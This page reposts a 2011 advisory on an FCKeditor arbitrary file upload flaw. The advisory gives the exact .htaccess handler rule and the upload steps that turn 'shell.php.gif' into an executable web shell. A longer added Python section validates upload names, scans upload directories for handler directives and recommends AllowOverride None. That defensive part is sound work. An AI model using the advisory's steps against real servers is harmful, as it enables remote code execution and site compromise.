FCKeditor Upload Vulnerability in All PHP Versions
Author: Anonymous   Source: compiled by this site   Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author: sinesafe.cn
[+] Website: WwW.sinesafe.cn
———————————————————
1. Create a .htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>

2. Now upload this .htaccess with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
———————————————————————————————-
3. Now upload shell.php.gif with FCKeditor.
4. After uploading shell.php.gif, the name "shell.php.gif" is changed to "shell_php.gif" automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. Now the shell is available from the server.
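The advisory above works because two things line up: the upload handler lets a `.htaccess` through, and its "sanitising" rename turns `shell.php.gif` into `shell_php.gif`, exactly the name the uploaded `FilesMatch` rule maps to the PHP handler. The following Python is an added defensive example, not code from the advisory or from FCKeditor: it shows an upload-name validator that refuses dotfiles, double extensions and the renamed-shell pattern, plus a scanner that walks an upload directory and reports any `.htaccess` carrying handler directives or any file matching the `_php.<ext>` rename. The allowlist, function names and the constructed demo tree are assumptions made for illustration.

```python
"""Defensive checks for the FCKeditor-style .htaccess + rename upload abuse.

Added example: a filename validator for an upload handler and a scanner for
existing upload directories. The extension allowlist is an assumption.
"""
import os
import re
import shutil
import tempfile

# Assumed allowlist of extensions an image/document upload endpoint needs.
ALLOWED_EXTENSIONS = {"gif", "jpg", "jpeg", "png", "pdf"}

# Apache directives that change how a file is served or executed. Any of them
# inside a user-writable directory is a finding regardless of the pattern used.
HANDLER_DIRECTIVE = re.compile(
    r"^\s*(SetHandler|AddHandler|AddType|php_value|php_flag"
    r"|php_admin_value|php_admin_flag)\b",
    re.IGNORECASE | re.MULTILINE,
)

# Stem suffix produced when "x.php.gif" is renamed to "x_php.gif".
RENAMED_SHELL_STEM = re.compile(r"_(php|phtml|php\d)$", re.IGNORECASE)
RENAMED_SHELL_FILE = re.compile(r"_php\.[a-z0-9]+$", re.IGNORECASE)


def is_upload_name_safe(name: str) -> bool:
    """Accept only a plain basename with exactly one allowlisted extension.

    Rejects path components, dotfiles such as .htaccess, names with a second
    dot (shell.php.gif) and stems ending in _php, so that no later rename can
    yield a name a FilesMatch rule could map to the PHP handler.
    """
    if not name or name != os.path.basename(name):
        return False
    if name.startswith("."):
        return False
    parts = name.split(".")
    if len(parts) != 2:
        return False
    stem, ext = parts
    if not stem or ext.lower() not in ALLOWED_EXTENSIONS:
        return False
    if RENAMED_SHELL_STEM.search(stem):
        return False
    return True


def scan_upload_dir(root: str) -> list:
    """Walk an upload tree and return (path, reason) findings.

    Flags .htaccess files that contain handler directives and files whose
    names match the _php.<ext> rename pattern from the advisory.
    """
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            if fname.lower() == ".htaccess":
                with open(path, "r", errors="replace") as fh:
                    content = fh.read()
                match = HANDLER_DIRECTIVE.search(content)
                if match:
                    findings.append((path, f"htaccess sets handler: {match.group(1)}"))
            elif RENAMED_SHELL_FILE.search(fname):
                findings.append((path, "double-extension rename pattern"))
    return findings


def demo_scan() -> list:
    """Build a constructed upload tree mirroring the advisory and scan it."""
    root = tempfile.mkdtemp(prefix="upload_demo_")
    try:
        # Constructed sample: the .htaccess from the advisory, a renamed
        # shell, and one benign image.
        with open(os.path.join(root, ".htaccess"), "w") as fh:
            fh.write('<FilesMatch "_php.gif">\n'
                     "SetHandler application/x-httpd-php\n"
                     "</FilesMatch>\n")
        open(os.path.join(root, "shell_php.gif"), "w").close()
        open(os.path.join(root, "photo.gif"), "w").close()
        return scan_upload_dir(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for candidate in ("photo.gif", ".htaccess", "shell.php.gif", "shell_php.gif"):
        print(f"{candidate!r:18} safe={is_upload_name_safe(candidate)}")
    for path, reason in demo_scan():
        print(f"FINDING {reason}: {path}")
```

The validator is the fix at the upload boundary; the scanner is for directories that were already exposed. Independently of both, serving the upload directory with `AllowOverride None` makes Apache ignore any uploaded `.htaccess`, so the `SetHandler` line in step 1 never takes effect even if the file lands on disk.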